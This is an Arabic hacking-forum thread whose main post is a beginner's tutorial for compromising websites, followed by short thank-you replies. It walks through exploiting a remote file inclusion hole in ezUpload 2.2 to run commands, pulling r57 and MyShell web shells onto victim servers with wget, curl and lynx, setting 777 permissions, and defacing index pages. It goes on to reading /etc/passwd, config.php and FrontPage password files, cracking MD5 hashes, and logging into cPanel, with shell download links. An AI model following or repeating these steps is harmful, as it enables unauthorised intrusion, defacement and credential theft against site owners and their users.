كما تلاحظون الاختيارات:


1- هذا هو التصريح 777 الذي يجب أن يكون drwxrwxrwx بدون شرطات كما في الصورة السابقة...


2- هذا هو المجلد الذي سوف نسحب ( = نرفع عليه ) الملف الذي نريد...


والآن كل شي جاهز ... المجلد ذو التصريح , والملف الذي سوف نسحبه ...

وأنا هنا سوف اسحب الشل ch99 للتوضيح لا أكثر ... ويمكن إنت بهذه الطريقة أن تسحب الإندكس Index الخاصة بالاختراق ...

أو أي شي آخر ... والآن اكتب في مكان تنفيذ الأوامر wget http://www.site.com/shell.zip

والشرح لمن يريد ==> wget دالتنا التي سوف نسحب بها الملف...

والموقع الذي بجنبها رفعنا عليه الشل مضغوط علشان نسحبه للموقع المخترق وعند كتابة الأمـر لن يظهر لك أي رد

والآن ... نحن رفعناه مضغوط فيجب فك ضغطه بالأمر unzip shell.zip والرد سوف يظهر في الصورة:



كما تلاحظون الرد المحاط بالأحمر يدل على نجاح العملية والآن ماذا لو لم تعمل هذه الدالة؟؟ أقولك ولا يهمك في دوال غيرها مثلا دالة curl

أيضا إذا أردت التحقق من أن الدالة تعمل ... ما عليك إلا كتابة which curl ... وإليكم شرح بعض دوال السحب

ولنفترض أن الملف الذي نريد سحبه هو worm.zip

نبدأ بالأداة lynx وطريقة سحب الملف كما يلي:::

lynx -source www.site.com/worm.zip > worm.zip

والأداة curl استخدامها كالتالي :::

curl -o worm.zip www.site.com/worm.zip

وأخيراً الدالة get استخدامها كالتالي

GET www.site.com/worm.zip > worm.zip


وكما شرحنا سابقا site.com هو الموقع الذي رفعنا الشل مضغوط ...


والآن نكمل شرح الشل الروسي ... لنفترض انك عندك ملف وتبي ترفعه للسيرفر ... والملف على جهازك وش تسوي؟؟؟

أقولك ولا يهمك ... إنزل بالشل للأسفل وشوف الاختيار هذا بالصورة:






1- هنا لاختيار الملف من جهازك ومعناه استعراض Browse

2- هذا الاختيار معناه رفع ... اي عند الانتهاء من اختيار الملف من جهازك اضغط عليه والآن شرح خفيف عن المسار الذي نحن فيه؟؟


/mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/html


كما تلاحظون المسار الذي نحن فيه نحن لسنا على المجلد الرئيسي

وأكيد راح تقولي ... شلون عرفت؟؟؟ وأنا أقولك المجلد الرئيسي إما إنه يكون

public_html

أو يكون على اسم الموقع كما في مسارنا

أو يكون www

وإلي أخره ... حسب السيرفر ... والحين عرفتوا احنا ليش مو على المجلد الرئيسي

ولكن أكيد راح تقولي أريد أن أكون على المجلد الرئيسي !!! وأنا أقول إنت تأمر...

نفذ أمر الانتقال من المجلد html ... كالتالي:::


cd /mounted-storage/home10/sub001/sc15759-CYAT/adult-city.ws/


مثل ما شفتوا انتقلنا من المجلد html عن طريق الأمر cd وهو يستخدم للدخول إلى مجلد معين وتغيير المسار....

------ ووووووووو ------



وهــذا شرح آخر للـ Shell ( نظري )...

طريقة الشرح عبارة عن سؤال , وجواب ...

لكى تصل المعلومة للمبتدء ولو بشكل بسيط

والموضوع هو عن الشل وأوامره واستخداماته ... إلخ

------------

بسم الله الرحمن الرحيم

------------

ماهو phpshell ؟

عباره عن سكربت مكتوب بلغة الـphp ويستخدم بالكثير من عمليات الهاكرز

وهو أساسي لكل مبتدء للسيطرة علي السيرفر بشكل كبير

------------


طيب اذكر لنا بعض الأوامر المهمة ؟

ماطلب حاجه ... هناك أوامر كثيرة ومنها ...

Ls

يستخدم لعرض الملفات الموجوده علي الموقع

Pwd

يستخدم لمعرفة مكان تواجدك بالسيرفر او بالموقع

id

يستخدم لمعرفة الصلاحيات التى تملكها

Wget

يستخدم لسحب ملف الي السيرفر ( رفع ملف : Upload File )

وهناك الكثير من الأوامر ....

------------

الله يعطيك العافيه طيب الحين أنا تعلمت معني الشل وبعض أوامره. طيب بسألك : له أنواع ولا لأ ؟

اى نعم له أنواع كثيره

------------

طيب ممكن تذكر لي كم مثال اذا ماعليك كلافه ؟

ان شاء الله طال عمرك بذكر لك كم نوع

Myshell

شل رائع جدا وسهل بنفس الوقت ويسمح لك بالتعديل علي الملفات

وتستطيع تعديل الاندكس Index بواسطة الامر

Edit index.php

( بشكل مختصر )

التحميل ...

http://www.i-saudi.com/lezr.com/MyShell-1.0.6.zip





------------



R57shell 1.22

شل روسي به العديد من المميزات

ومنها رفع ملف من جهازك الي الموقع مباشره

دون استخدام اى امر من اوامر لينكس

والاتصال بالباكدور سوا بلغة البيرل او السي

واظهار معلومات عن السيرفر من اصدار كيرنل ونوع ... إلخ

( بشكل مختصر )

التحميل ...

http://www.shellteam.net/clever.txt?



------------



R57shell 1.23

ايضا شل روسي

وبه الكثير من المميزات الغير موجوده

بالشل السابق ومنها الاتصال بقاعده البيانات

واخذ نسخه من قاعده البيانات وايضا يوفر

الشل باكدور ولكنه غير فعال لتوفر جدار الحمايه

والكثير .. إلخ

( بشكل مختصر )

التحميل ...

http://www.me3ady.com/up/up/r57.23.zip



------------

' ويوجد العديد من الانواع '

------------

الحمدلله ؛ لحد الآن فاهم معاك : طيب ممكن اعرف كيف ارفع الشل علي موقع او منتدى ؟

هناك ثغرات عديده تسمح لك بتطبيق اوامر اللينكس وتستطيع رفع شل او باكدور علي الموقع

------------

رائع طيب اذكر لي ثغره ؟

من عيوني توجد ثغره تسمح لك بتطبيق اوامر اللينكس

وراح اشرحها لخاطرك

الثغره في السكربت ezUpload

وبالتحديد بالاصدار 2.2

------------

الله يعطيك العافيه وفهمت من كلامك انى ابحث بقوقل كذا ezUpload 2.2 ؟

نعم تبحث بقوقل مثل ماذكرت كذا ezUpload 2.2

------------

طيب وبحثت وحصلت لي موقع كيف استغل الثغره ؟

سؤال حلو وراح اجاوبك عليه اخوى والملفات المصابه من السكربت هي التاليه ..

customize.php

index.php

forum.php

initialize.php

يعني حصلنا موقع مصاب وخلنا نقول هالموقع

http://xxx.com/ezupload

ومثل ماذكرت لك الملفات المصابه هي ...

customize.php

index.php

forum.php

initialize.php

يعني ناخذ اى ملف ونحطه ورا الرابط وخلنا نقول هالملف customize.php

يعني راح يصير الرابط كذا ..

http://xxx.com/ezupload/customize.php

وتبي تقول لي ماصار شيء وش استفد بقول لك لا تستعجل كل شيء بوقته

الحين بقولك ارفع cmd.gif على موقعك المجانى.

------------

طيب بس سؤال واسف علي المقاطعه اذا ممكن ؟

تفضل اسأل اخوى ولا تعودهآ

------------

ان شاء الله حبيت أعرف وش هي يعني cmd.gif مو حلوه أرفعها ولا أدري وش فايدتها ؟

سؤال جيد بقول لك هذى تسمح لك بتطبيق اوامر اللينكس ( سبق شرحها فى الأعلي ) وتفضل حملها

http://www.me3ady.com/up/up/cmd.zip

------------

طيب بس سؤال ثاني لو سمحت . يعني بس تيجي كده cmd.gif ولا فى نوع ثاني؟

ايضا سؤال جيد نعم اخوى ممكن تجىء كذا cmd.gif وايضا ممكن تيجى كذا cmd.txt ..إلخ

------------

طيب تفضل اخوى كمل شرحك اذا ممكن ؟

ان شاء الله طال عمرك صرت صبي عندك لؤؤؤؤل لا امزح معك يالله نكمل

مثل ماقلت لك اخترنا هالملف customize.php

وصار رابط الموقع كذا

http://xxx.com/ezupload/customize.php

الحين بقولك هات رابط الـ cmd.gif بعدما رفتعها على موقعك

الحين عندنا الملفات المصابه وموقع مصاب و cmd.gif

بقول لك الان راح يكون رابط الموقع مع رابط cmd.gif كذا ..

http://xxx.com/ezupload/customize.ph...xx.com/cmd.gif

طيب تبي تقول ماصار شيء بقول لك ضيف بعد الرابط التالي ..

?&cmd=id

يعني راح يكون الرابط كذا

http://xxx.com/ezupload/customize.ph...md.gif?&cmd=id

وراح يطلع لك التالي .. مثلا ..

uid=99(nobody) gid=99(nobody) groups=99(nobody)

------------

طيب اخوى دكتور جرح بس سؤال وش معني اللى ظهر لي ؟

انا شرحت لك ياخوى اول شيء ان هالامر id معناته يظهر صلاحيتك

وصلاحيتك الان nobody

------------

مقاطعه " نكتب الامر التالي عشان نعرف احنا وين بالضبط واللى هو الامر .. "

Pwd

------------

طيب مشكور اخوي تفضل كمل الشرح اذا ماعليك امر ؟

امري لله وبكمل معاك للنهايه واشوف وش تاليها معاك

------------

الحين ظهرت صلاحيتا يالطيب بقول لك اول شيء نكتب الامر التالي ..

which wget

وادري تبي تقول : وش هالامر ؟ بقول لك هالامر يشوف نقدر نسحب ملف علي الموقع ولا لأ

يعني بالعربي اقدر ارفع ملف ولا لأ

يالله نكتبه ونشوف وش يظهر لنا

------------

طيب بس سؤال وين اكتب الامر ؟

اخوى الامر نكتبه بدال id يعني راح نحذفها ونحط محلها which wget

------------

طيب كمل اخوى دكتور جرح ...

ابشر راح اكمل لخاطرك ...

حلو ظهر لنا مثلا .. /usr/bin/wget وادري تبي تلقف

وتقول وش اللى ظهر لنا مافهمت !

بقول لك يعني نقدر نرفع ملف علي الموقع

بالعربي مسموح لنا نرفع

طيب الحين نبي نرفع اى شل من اللى شرحتهم انا

امممم

نقول Myshell احلي والله واعزه كثير

يالله ياخوى خلنا نرفع ونفتك من هالموقع ومنك لؤؤل

الحين بقول لك ارفع الشل علي موقعك المجانى ( الموقع راح فيها لؤؤل )

------------

مافهمت وضح لي اكثر لو سمحت ؟

طيب انت الان بعد ماحملت الشل ارفعه علي موقعك المجانى بصيغه zip يعني وين زاب

طيب فهمت عليك

------------

ياريت تكمل طال عمرك ...

ابشر راح اكمل معاك

الحين بقول لك جيب رابط الشل بعد مارفعته علي موقعك المجانى

وخلنا نرفعه علي الموقع االلى نطبق عليه من اليوم

وادري ياخوي بتقول كيف ارفع والله ؟ ادري

بقول لك انا قلت لك بالبدايه هالامر wget وظيفته الرفع علي الموقع

طيب يالله خلنا نرفع

بس بقول لك صبر قبل لا نرفع خل نشوف لنا ملف تصريحه 777

------------

طيب بس سؤال ليش ملف تصريحه 777 ؟

عشان ياخوى تقدر تستخدم اى امر فيه

من قراءه : Read ، كتابة : Write , رفع : Upload ، تعديل : Edit ... إلخ

------------

طيب فهمت عليك يالله كمل اخوى ..

ان شاء الله بكمل والحين نعرض الملفات مع تصاريحها بالامر ls –l

ظهرت لنا الملفات مع تصاريحها

ونشوف الملف اللى تصريحه 777 ويجيك كذا ..

rwxrwxrwx

طيب ياخوي تبي تقول ماحصلت ملف وش اسوى ؟

بقول لك عط تصريح لاي ملف وان شاء الله مسموح لك

------------

طيب ياخوي ما اعرف كيف اعطي تصريح لملف ممكن تقول لي الطريقه ؟

ان شاء الله اخوى الطريقه كالتالي ..

Chmod 777 filename

------------

طيب اخوى ممكن توضح اكثر لانى مو عارف شيء ؟

ابشر اخوي راح اوضح لك اكثر وبقول لك ..

Chmod = يستخدم هالامر لاعطاء التصريحات للملفات

777 = تصريح رقم 777 وذكرت وش معناته

Filename = اسم الملف اللى نبي نعطيه التصريح رقم 777

------------

طيب فهمت عليك الله يجزاك خير كمل ...

يالله نكمل تبي تقول عطيته تصريح وابي اتآكد انه يملك التصريح 777 بقول لك اعرض الملفات من جديد مع تصاريحها بالامر ls –l

وراح تحصل الملف اللى عطيته التصريح رقم 777 مكتوب بجانبه التالي ...

rwxrwxrwx

تمام يعني الحين نقدر نسوى اى شيء علي هالملف

يالله الان نبي نرفع الشل ( ماصارت رفع لؤؤل )

ونكتب.. هالامر التالي

wget www.xxx.com/myshell.zip;ls myshell*

طيب بقول لك وش المتغيرات

Xxx = اسم موقعك المجانى

Myshell.zip = اسم الشل اللى رفعته علي موقعك

طيب حلو تبي تقول ليش كتبنه ls ؟ بقول لك عشان نتأكد ان الشل مرفوع

طيب الحين يوم كتبنا الامر ls شفنا الملفات وطلع منهم الشل اللى رفعناه

بقول لك زين علي زين الحين نفك الضغط عن الشل وادري تبي تقول لي كيف ؟؟؟

بقول لك من عيوني الحين اعلمك كيف ونكتب الامر التالي ..

Unzip myshell.zip;ls

المتغيرات ...

myshell.zip = اسم الشل اللى رفعناه علي موقعنا

والامر ls كتبناه عشان نشوف الشل بعد فك الضغط موجود ولا لأ

طيب طلعت لنا الملفات ومنهم الشل ... مالنا ...ومكتوب كذا myshell.php

بقول لك حلو وماشاء الله عليك شكلك فاهم المهم الحين نبي نروح للشل مالنا

بقول لك ابشر وماطلبت حاجه

مثلا رفعنا الشل علي المجلد الرئيسي للموقع راح يكون رابطه كذا

www.xxx.com/myshell.php

طيب رفعناه علي المنتدى راح يكون رابطه كذا

www.xxx.com/forum/myshell

واعتقد القصد وضح لك يعني الملف اللى رفعنا عليه الشل

نحطه بعد رابط الموقع وبعده اسم الشل اللي فرضنا اسمه هو myshell

واعتقد ذكرت بالبدايه ان نكتب الامر pwd عشان نعرف احنا وين بالضبط

الان الحمدلله الشل مرفوع وكل شيء تمام

------------

بس يادكتور طلب منى باسورد الشل مع اليوزر وش اسوى ؟

يالطيب تقدر تغير الباسورد واليوزر علي كيفك لكن انا مخليهم

User = Dr.Jr7

Pass = Dr.Jr7

أو تقريباً الـ Pass يساوي = 123456

------------

طيب تمام عليك قدرت ادخل الشل وش اسوى ؟

يالطيب راح اذكر لك بعض الاوامر المهمه ..

الامر ...

cat /homepublic_html/_vti_pvt/access.cnf

الثاني يوزر نيم والموقع

------------

الامر ...

ls /var/named

وهو لاستعراض المواقع علي الموجوده علي السيرفر

------------

الامر ...

لاخراج المواقع اللى على السيرفر

cat /etc/httpd/conf/httpd.conf

------------

الأمر ...

cat /homepublic_html/_vti_pvt/access.cnf

أمر معرفة أسامي المواقع التي تستخدم الفرونت بيج

------------

الأمر ...

cat /homeadmin/config.php

cat /homeadmincp/config.php

أمر عرض ملفات الــ config.php للبرامج المثبته على المواقع مثل

المنتديات والمجلات وغيرها من الملفات التي تستخدم الــ config

------------

الامر ...

cat /etc/domainalias

عرض المواقع مع أسامي المستخدمين

------------

الامر ...

find / -name config.php

البحث عن جميع الملفات التي إسمها config.php

وستطيع البحث في هذا الأمر عن أي ملف تريد

------------

الامر ...

cat /etc/passwd

يظهر جميع باسوردات المواقع التي على السيرفر

وإذا كان اللي ظهر لك بالطريقه هذي

carlos:vmYQDR1pWRVLE

معناها ان carlos إسم الموقع

وإن vmYQDR1pWRVLE هو الباسورد المشفر

أما إن طلع لك بالطريقه هذي

carlos:x

فمعنى الــ x ان الباسورد مخفي وما تقدر تشوفه

------------

يعطيك العافيه اخوي دكتور جرح علي الاوامر ... بس هذى الاوامر ؟

العفو اخوى ... وفيه أوامر تانية كتيييييييييييرة جداً ... إن شاء الله هنوضحها

------------

الله يعطيه العافيه طيب الحين عرفت الشل وعرفت اوامره وعرفت ارفع شل وعرفت ولله الحمد بعد ما ادخل الشل وش اسوى .

طيب انت قلت تقدر تغير الاندكس index وانت من الشل وضح لي اكثر ؟

( سأشرح كيفية التحكم , والسيطرة الكاملة علي السيرفر فى الدروس القادمة " إن شاء الله " )

اول شيء الحمدلله انى قدرت افهمك كم شغله بسيطه واما بخصوص الاندكس ... نعم تقدر

وأول شيء تشوف انت وينك بالضبط بالامر pwd ونقول مثلا انت بالمنتدى

بتقول يادكتور برجع للمجلد الرئيسي كيف ؟

بقول اكتب cd .. واضغط انتر بعدها اكتب pwd راح تلاحظ

انك انت بالمجلد الرئيسي طيب تبي تقول حلو

بس الحين وش اسوى ??? بقول لك اكتب ls وراح تظهر الملفات

وراح تلاحظ وجود index.php or index.html

طيب بتقول حلو الحين وش اسوى بقول لك اكتب الامر التالي ..

edit index.php

طيب بتقول وش اسوى الحين ظهر لي السورس مال الصفحه بقول لك امسح السورس

وروح للفرونت بيج واكيد انت مجهز صفحت الاختراق وانسخ الكود وحطه مكان السورس

اللى مسحته قبل شوي . وبعدها اضغط على save and exit . طيب وراح يظهر لنا التالي

Filename: Filename: saved

ويعني حفظ التغيرات

والحين تغيرت الصفحه الرئيسيه

وتقدر تلاحظ انت بنفسك وتشوف تغيرت ولا لا ( تكتب الموقع بحاله وتشوف )

------------

الله يعطيك العافيه والحمدلله قدرت افهم اشياء كثيره طيب الحين الاندكس بس بالمجلد الرئيسي ؟

علي ما اعتقد نعم ( غالبا )

------------

طيب يادكتور نسيت اسالك سؤال ؟

شنو السؤال ... ؟

------------

الحين انا جبت باسوردات المواقع مشفره كيف افك التشفير ؟

بقول لك استخدم برنامج john , أو Rainbow Crack

وبالنسبة لبرنامج John فهو سهل الاستخدام , أمـا برنامج Rainbow Crack فهو صعب نسبياً بالنسبة للمبتدئين ولكنه الأقوي...

, وتوجد مواقع لفك الباسوردات المشفرة من نوع MD5 مثــل :::

milw0rm

بعد ما ندخل عليه نروح الـ cracker

بعدين ندخل علي insert






وراح يطلع لنا مستطيل نحط فيه الباس المشفر ونختار MD5

ونفترض هذا الباسورد المشفر

e10adc3949ba59abbe56e057f20f883e

وبعدها نضغط علي الـ submit

وراح يطلع لك الباسورد بعد فك التشفير

وهو 123456

ونفترض ما طلع بنفس الوقت ... روح أعمل بحث علي الهاشات ( الباسوردات المشفرة ) التي تم فك تشفيرها من خلال ...

خاصية Cracked Hashs إلي أن تجد الهاش الذي وضعته ...

واكتب الباس مشفر ... وموفق يالغالي ( ومش شرط يظهر الباس في نفس الوقت ... ممكن ياخد فترة )

&&&

أو ... روح لموقع passcracking.com وضع الباسورد المشفر MD5 وسيتم فك الباسورد المشفر خلال 24 ساعة إلي 72 ساعة ...

------------

طيب يعطيك العافيه ومثلا قدرت أفك الباسورد المشفر كيف اقدر ادخل ؟

بقول لك تقدر من الإف تي بي ftp او تكتب بعد رابط الموقع ...

www.xxx.com:2082

www.xxx.com/cpanel

* لوحة التحكم ممكن تكون فعلاً علي هذا المسار site.com:2082 أو cpanel ,,, ولكن هذا افتراضياً وفي الغالي بتتغير *

يعنـــــــي ...

( مش لازم يكون 2082 أو cpanel ) فقط تابع الشرح ( " وإن شاء الله " ) وهتعرف إزاي تتحكم فى السيرفر كله

( وسأشرح كيفية الدخول للموقع والسيطرة عليه والدخول إلي لو حة التحكم وووو " فقط تابع الشرح " )

ووووووو

------------

الله يعطيك العافيه ومن جد ماقصرت بس بسألك اقدر اشوف باسورد الموقع اذا كان يدعم الفرونت بيج ؟

بقول لك نعم تقدر وتروح للمسار التالي وانت بالشل

cd / public_html/_vti_pvt

بعدها بقول لك اعرض الملفات بالامر ls

وراح تلاحظ من الملفات الموجوده هالملف service.pwd

بتقول لي كيف اروح له بقول لك لا تروح له أقرأ الملف عادى

وادري بتسأل وتقول كيف اقرأ او شنو امر القراءة بقول لك امر القراءة هو cat

يعني نكتب الامر التالي ...

cat service.pwd

راح تلاحظ الباسود مشفر قدامك " إن شاء الله "

------------

------------

------------

واعتذر ان كان هناك اى خطأء والانسان مو معصوم من الخطأ

وبالاخير أتمنى للمبتدئين كل خير

------------

------------

------------

؛؛؛ وهـــكذا انتهي شرح الشل ؛؛؛

منقول عن الاخ
جني هكر

**********************************



:: j'fdr hgeyvm hglkhsfm < ,vtu hgag Shell ,jktd` hgH,hlv hgl'g,fm >>>

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
قديم 07-26-2009, 01:13 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية TheGame
 

 

 
إحصائية العضو







TheGame غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
TheGame is on a distinguished road

افتراضي


مشكور شرح اكثر من رائع ويشرفني ان اكون اول رد

   

رد مع اقتباس
قديم 07-26-2009, 01:42 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي


العفو اخي

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
قديم 07-26-2009, 02:50 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
الصورة الرمزية harcha
 

 

 
إحصائية العضو





harcha غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
harcha is on a distinguished road

افتراضي


ممكن اختراق منتديات phpbb

   

رد مع اقتباس
قديم 07-28-2009, 09:07 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية Mr.511
 

 

 
إحصائية العضو





Mr.511 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Mr.511 is on a distinguished road

افتراضي


يعطيك الف عافيه

   

رد مع اقتباس
قديم 07-29-2009, 12:13 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي


الله يعافيك
مشكور على المرور

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
قديم 07-29-2009, 04:35 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية THE WARRIOR
 

 

 
إحصائية العضو






THE WARRIOR غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
THE WARRIOR is on a distinguished road

افتراضي


شكرا ليك اخى على الشرح جزاك الله الف خير

التوقيع

we will never walk AlOne

 

   

رد مع اقتباس
قديم 07-30-2009, 06:10 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية LAV4
 

 

 
إحصائية العضو







LAV4 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
LAV4 is on a distinguished road

افتراضي


شكرا لك على المرور

التوقيع



lava my name

hacker my game

 

   

رد مع اقتباس
قديم 08-02-2009, 08:03 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية reeve
 

 

 
إحصائية العضو





reeve غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
reeve is on a distinguished road

افتراضي


مشكور ويعطيك العافيه ع المجهود الي بذلته من اجل
اخوانك وبيض الله وجهك

   

رد مع اقتباس
قديم 12-06-2009, 12:51 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية DR-HEX
 

 

 
إحصائية العضو





DR-HEX غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
DR-HEX is on a distinguished road

افتراضي


مشكور شرح اكثر من رائع ويشرفني ان اكون اول رد

   

رد مع اقتباس
قديم 12-16-2010, 03:14 AM   رقم المشاركة : 11 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي


بارك الله فيك

التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 

   

رد مع اقتباس
قديم 12-17-2010, 07:43 PM   رقم المشاركة : 12 (permalink)
معلومات العضو
 
الصورة الرمزية " N "
 

 

 
إحصائية العضو







" N " غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
" N " is on a distinguished road

افتراضي


امممممممممممممممم ,

لآهنت ع التنسيق والطرح وآلششرح

الله يعطيك آلف عآآفيه

تقبل مروري

~

   

رد مع اقتباس
قديم 07-08-2014, 06:35 AM   رقم المشاركة : 13 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

افتراضي رد: :: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...


سكربت الرد على المواضيع مزعج يا إدارة المنتدى

   

رد مع اقتباس
قديم 07-30-2014, 11:58 PM   رقم المشاركة : 14 (permalink)
معلومات العضو
 
الصورة الرمزية darknet
 

 

 
إحصائية العضو







darknet غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
darknet is on a distinguished road

افتراضي رد: :: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...


شكرااا لك

   

رد مع اقتباس
قديم 05-23-2015, 07:53 PM   رقم المشاركة : 15 (permalink)
معلومات العضو
 
الصورة الرمزية alshe5e
 

 

 
إحصائية العضو







alshe5e غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
alshe5e is on a distinguished road

افتراضي رد: :: تطبيق الثغرة المناسبة , ورفع الشل Shell , وتنفيذ الأوامر المطلوبة ...


thanx

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
موقع شيعي جاهز للدعس ورفع الشل aircrack -ng SQL قواعد البيانات 47 12-29-2010 10:18 PM
طلب شرح ايجاد ثغرة على سيرفر ورفع الشل ZaIdOoH HackeR جـــ'ابات العناكــ'ب 6 06-15-2010 11:57 PM
تعال يا[you] اذا كنت تشرحلي العلاقة بين الثغرة ورفع الشيل khamed tabet جـــ'ابات العناكــ'ب 15 06-12-2010 04:37 PM


الساعة الآن 02:48 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0